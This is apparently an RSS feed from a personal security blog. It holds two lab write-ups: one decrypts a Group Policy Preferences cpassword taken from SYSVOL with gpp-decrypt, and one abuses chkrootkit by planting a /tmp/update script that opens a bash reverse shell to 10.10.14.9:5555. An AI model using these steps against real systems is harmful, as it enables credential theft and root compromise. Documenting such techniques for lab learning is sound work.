Chkrootkit on rchitecthttps://www.rchitect.in/tags/chkrootkit/Recent content in Chkrootkit on rchitectHugoenThu, 15 Sep 2022 00:00:00 +0000gpp-decrypt for password de-crypthttps://www.rchitect.in/posts/gpp-decrypt/Thu, 15 Sep 2022 00:00:00 +0000https://www.rchitect.in/posts/gpp-decrypt/<h1 id="usage-of-gpp-decrypt"> Usage of gpp-decrypt <a class="heading-link" href="#usage-of-gpp-decrypt"> <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i> <span class="sr-only">Link to heading</span> </a> </h1> <p>&ldquo;gpp-decrypt&rdquo; is a tool built of python3 which can be used for decrypting AD related passwords.</p> <p>During some of the active directory labs, I could see a &ldquo;groups.xml&rdquo; which contain the local admininistartor password in encrypted format. I have used the &ldquo;gpp-decrypt&rdquo; to decrypt the password.</p> <pre tabindex="0"><code>smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&gt; ls . D 0 Sat Jul 21 06:37:44 2018 .. D 0 Sat Jul 21 06:37:44 2018 Groups.xml A 533 Wed Jul 18 16:46:06 2018 5217023 blocks of size 4096. 278651 blocks available smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&gt; get Groups.xml getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec) smb: \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\&gt; exit ┌──(rocky㉿kali)-[~/hckbox/Active-1/smb] └─$ cat Groups.xml &lt;?xml version=&#34;1.0&#34; encoding=&#34;utf-8&#34;?&gt; &lt;Groups clsid=&#34;{3125E937-EB16-4b4c-9934-544FC6D24D26}&#34;&gt;&lt;User clsid=&#34;{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}&#34; name=&#34;active.htb\SVC_TGS&#34; image=&#34;2&#34; changed=&#34;2018-07-18 20:46:06&#34; uid=&#34;{EF57DA28-5F69-4530-A59E-AAB58578219D}&#34;&gt;&lt;Properties action=&#34;U&#34; newName=&#34;&#34; fullName=&#34;&#34; description=&#34;&#34; cpassword=&#34;edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ&#34; changeLogon=&#34;0&#34; noChange=&#34;1&#34; neverExpires=&#34;1&#34; acctDisabled=&#34;0&#34; userName=&#34;active.htb\SVC_TGS&#34;/&gt;&lt;/User&gt; &lt;/Groups&gt; </code></pre><h5 id="why-this-password-was-shown-in-this-folder"> Why this password was shown in this folder: <a class="heading-link" href="#why-this-password-was-shown-in-this-folder"> <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i> <span class="sr-only">Link to heading</span> </a> </h5> <p>This was due to the Microsoft group policy preference. Due to this settings a sysvol is created with encrypted password of admin. More can be read <a href="https://adsecurity.org/?p=2288" class="external-link" target="_blank" rel="noopener">here</a>.</p>chkrootkit exploit for privilege esclationhttps://www.rchitect.in/posts/chk-rootkit/Wed, 09 Mar 2022 00:00:00 +0000https://www.rchitect.in/posts/chk-rootkit/<h1 id="chkrootkit-exploit"> Chkrootkit Exploit <a class="heading-link" href="#chkrootkit-exploit"> <i class="fa-solid fa-link" aria-hidden="true" title="Link to heading"></i> <span class="sr-only">Link to heading</span> </a> </h1> <p>I have tried pspy and i could see the chkrootkit</p> <p>Lets search for the exploit</p> <p>As per this exploit if you create any exploit ,if you create a file named &ldquo;update&rdquo; under /tmp.</p> <pre tabindex="0"><code>amrois@nineveh:/tmp$ printf &#39;#!/bin/sh\n&#39; &gt; update amrois@nineveh:/tmp$ printf &#39;/bin/bash -c &#34;/bin/bash -i &gt; /dev/tcp/10.10.14.9/5555 0&lt;&amp;1&#34;\n&#39; &gt;&gt; update amrois@nineveh:/tmp$ chmod +x update </code></pre><p>Or You can use EOF to repalce printf command like below</p>